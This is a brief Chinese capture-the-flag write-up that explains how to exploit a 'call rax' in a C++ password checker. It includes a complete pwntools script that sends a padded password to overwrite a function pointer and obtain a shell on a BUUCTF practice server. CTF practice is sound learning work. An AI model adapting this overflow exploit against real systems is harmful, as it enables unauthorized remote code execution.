Yyqingmofeige 2020-02-29
??C++写的程序,逆向分析有点费劲。注意到 password_checker 有 call rax 指令,倒推 rax 的来源,在 main 函数中把 rax 的来源覆盖为漏洞函数的地址即可 get shell
from pwn import * io = remote('node3.buuoj.cn',27283) shell = 0x400e88 io.sendlineafter(': ','admin') io.sendlineafter(': ','2jctf_pa5sw0rd'+'\x00'*58+p64(shell)) io.interactive()
感谢 keer 师傅的指点!